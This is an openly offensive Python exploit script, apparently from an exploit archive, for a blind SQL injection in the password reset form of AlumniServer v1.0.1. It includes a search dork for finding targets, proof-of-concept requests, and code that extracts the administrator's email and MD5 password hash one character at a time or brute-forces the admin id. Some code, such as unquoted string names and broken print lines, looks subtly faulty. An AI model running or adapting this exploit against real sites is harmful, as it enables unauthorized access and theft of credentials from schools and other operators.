(POST var resetpwemail) BLIND SQL INJECTION EXPLOIT --AlumniServer v-1.0.1-->

#!/usr/bin/python
#--------------------------------------------------------------------------------
#(POST var resetpwemail) BLIND SQL INJECTION EXPLOIT --AlumniServer v-1.0.1-->
#--------------------------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://www.alumniserver.net/
#-->DOWNLOAD: http://www.alumniserver.net/
#-->DEMO: N/A
#-->CATEGORY: CMS/Education
#-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools
#		and companies. Services for usersinclude profile page,...
#-->RELEASED: 2009-06-11
#
#CMS VULNERABILITY:
#
#-->TESTED ON: Python 2.6
#-->DORK: "AlumniServer project"
#-->CATEGORY: BSQLi PYTHON EXPLOIT
#-->AFFECT VERSION: CURRENT
#-->Discovered Bug date: 2009-06-15
#-->Reported Bug date: 2009-06-15
#-->Fixed bug date: N/A
#-->Info patch (????): N/A
#-->Author: YEnH4ckEr
#-->mail: y3nh4ck3r[at]gmail[dot]com
#-->WEB/BLOG: N/A
#-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
#-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)
#
#------------
#CONDITIONS:
#------------
#
#magic quotes=OFF
#
#--------
#NEEDED:
#--------
#
#Valid email
#
#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------
#
#POST http://[HOST]/[PATH]/Password.php HTTP/1.1
#Host: [HOST]
#Referer: http://[HOST]/[PATH]/Password.php
#Content-Type: application/x-www-form-urlencoded
#
#resetpwemail=[valid_mail]%27+and+1%3D%270 --> FALSE
#resetpwemail=[valid_mail]%27+and+1%3D%271 --> TRUE
#
#Other P0C (with a registered user):
#
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=0%23 -->FALSE
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=1%23 -->TRUE
#
#--------------
#WATCH VIDEOS
#--------------
#
# BSQLi --> http://www.youtube.com/watch?v=K3z7iyHttBw
#
# AUTH BYPASS --> http://www.youtube.com/watch?v=UjDm2p7qHj0
#
#
#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################
#
#Used modules
import urllib2,sys,re,os
#Defined functions
def init():
	if(sys.platform==win32):
		os.system("cls")
		os.system ("title AlumniServer v-1.0.1 Blind SQL Injection Exploit")
		os.system ("color 02")
	else:
		os.system("clear")

	print "	#######################################################

"
	print "	#######################################################

"
	print "	##     AlumniServer v-1.0.1 Blind SQLi Exploit       ##

"
	print "	##       ++Conditions: magic_quotes=OFF              ##

"
	print "	##       ++Needed: Valid mail                        ##

"
	print "	##               Author: Y3nh4ck3r                   ##

"
	print "	##      Contact:y3nh4ck3r[at]gmail[dot]com           ##

"
	print "	##            Proud to be Spanish!                   ##

"
	print "	#######################################################

"
	print "	#######################################################

"
	
def request(urltarget,postmsg):
	req=urllib2.Request(url=urltarget,data=postmsg)
	conn = urllib2.urlopen(req)
	outcode=conn.read()
	#print outcode #--> Active this line for debugger mode
	return outcode

def error():
	print "	------------------------------------------------------------
"
	print "	Web isnt vulnerable!

"
	print "	--->Maybe:

"
	print "		1.-Patched.
"
	print "		2.-Bad path or host.
"
	print "		3.-Bad mail.
"
	print "		4.-Magic quotes ON.
"
	print "		EXPLOIT FAILED!
"
	print "	------------------------------------------------------------
"
	sys.exit()

def testedblindsql():
	print "	-----------------------------------------------------------------
"
	print "	WEB MAYBE BE VULNERABLE!

"
	print "	Tested Blind SQL Injection.
"		
	print "	Starting exploit...
"
	print "	-----------------------------------------------------------------

"

def helper(filename):
	print "
	[!!!] AlumniServer v-1.0.1 Blind SQL Injection Exploit
"
	print "	[!!!] USAGE MODE: [!!!]
"
	print "	[!!!] python "+filename+" [HOST] [PATH] [MAIL] [ID_ADMIN/HIDDEN/BRUTEFORCEID]
"
	print "	[!!!] [HOST]: Web.
"
	print "	[!!!] [PATH]: Home Path.
"
	print "	[!!!] [MAIL]: Mail for fish
"
	print "	[!!!] [ID_ADMIN/HIDDEN/BRUTEFORCEID]: Id_admin if we are registered users or hidden value if admin is hidden.
"
	print "	[!!!]  Also can use bruteforceid value for bruteforce admin id previously.
"
	print "	[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com cd54cd7df99a
"
	print "	[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com hidden
"
	print "	[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com bruteforceid
"
	sys.exit()
	
def brute_length(urlrequest, idadmin, mail):
	#Username length
	flag=1
	i=0
	while(flag==1):
		i=i+1
		if(idadmin=="hidden"):
			blindsql="resetpwemail="+mail+"+AND+(SELECT+length(email)+FROM+as_users+WHERE+hideuser=y)="+str(i) #injected code
		else:
			blindsql="resetpwemail="+mail+"+AND+(SELECT+length(email)+FROM+as_users+WHERE+id="+idadmin+")="+str(i) #injected code
		output=request(urlrequest, blindsql)
		if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
			flag=2
		else:
			flag=1
		#This is the max length of email
		if (i>50):
			error()
		#Save column length
	length=i
	print "	<<<<<--------------------------------------------------------->>>>>
"
	print "	Length catched!
"
	print "	Length E-mail --> "+str(length)+"
"
	print "	Wait several minutes...
"
	print "	<<<<<--------------------------------------------------------->>>>>

"
	return length
def exploiting (lengthvalue, urlrequest, column, idadmin, mail):
	#Bruteforcing values
	values=""
	k=1
	z=32
	while((k<=lengthvalue) and (z<=126)):
		#Choose method, hidden or with id
		if(idadmin=="hidden"):
			blindsql="resetpwemail="+mail+"+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+hideuser=y),"+str(k)+",1))="+str(z) #injected code
		else:
			blindsql="resetpwemail="+mail+"+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+id="+idadmin+"),"+str(k)+",1))="+str(z) #injected code
		output=request(urlrequest, blindsql)
		if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
			values=values+chr(z)
			k=k+1
			z=32
#new char
		z=z+1 
	return values
	
def exploiting_id (urlrequest, mail):
	#Bruteforcing values
	values=""
	#Possible values of id
	arrayids=[0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f]
	k=1
	#Max length of id = 12
	while(k<=12):
		for z in arrayids:	
			blindsql="resetpwemail="+mail+"+AND+substring((SELECT+id+FROM+as_users+HAVING+MIN(membersince)),"+str(k)+",1)="+str(z) #injected code
			output=request(urlrequest, blindsql)
			if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
				values=values+str(z)
				k=k+1
				z=g		
	return values
#Main
init()
#Init variables
if(len(sys.argv) <= 4):
    helper(sys.argv[0])

host=sys.argv[1]
path=sys.argv[2]
mail=sys.argv[3]
#Define mode: ID, hidden or bruteforceid
if(sys.argv[4]=="hidden"):
	mode="hidden"
elif(sys.argv[4]=="bruteforceid"):
	mode="bruteforceid"
else:
	mode="usual"
	idadmin=sys.argv[4]

finalrequest="http://"+host+"/"+path+"/Password.php"
testblind1="resetpwemail="+mail+"%27+and+1%3D%271" #Return true
outcode1=request(finalrequest,testblind1)
testblind2="resetpwemail="+mail+"%27+and+1%3D%270" #Return false
outcode2=request(finalrequest,testblind2)
#Check BSQLi
if(outcode1==outcode2):
	error()
else:
	testedblindsql()
if(mode=="usual"):
	#Catching length of admin email
	lengthadmin=brute_length(finalrequest, idadmin, mail)
	mailadmin=exploiting(lengthadmin, finalrequest, "email", idadmin, mail)
	#Catching value of password (hashed md5)
	passwordhash=exploiting(32, finalrequest, "password", idadmin, mail)
elif(mode=="hidden"):
	#Catching length of admin email
	lengthadmin=brute_length(finalrequest, "hidden", mail)
	mailadmin=exploiting(lengthadmin, finalrequest, "email", "hidden", mail)
	#Catching value of password (hashed md5)
	passwordhash=exploiting(32, finalrequest, "password", "hidden", mail)
else:
	print "	<<<<<--------------------------------------------------------->>>>>
"
	print "	Bruteforcing id. Wait a few minutes...
"
	print "	<<<<<--------------------------------------------------------->>>>>

"
	#Catching value of admin id
	idadmin=exploiting_id(finalrequest, mail)

print "
		*************************************************
"
print "		*********  EXPLOIT EXECUTED SUCCESSFULLY ********
"
print "		*************************************************

"
#Mode usual and hidden
if((mode=="usual") or (mode=="hidden")):
	print "		Admin-mail: "+mailadmin+"

"
	print "		Password hash: "+passwordhash+"

"
else:
#Mode bruteforceid
    print "		Admin-id: "+idadmin+"

"
print "
		<<----------------------FINISH!-------------------->>

"
print "		<<---------------Thanks to: y3nh4ck3r-------------->>

"
print "		<<------------------------EOF---------------------->>

"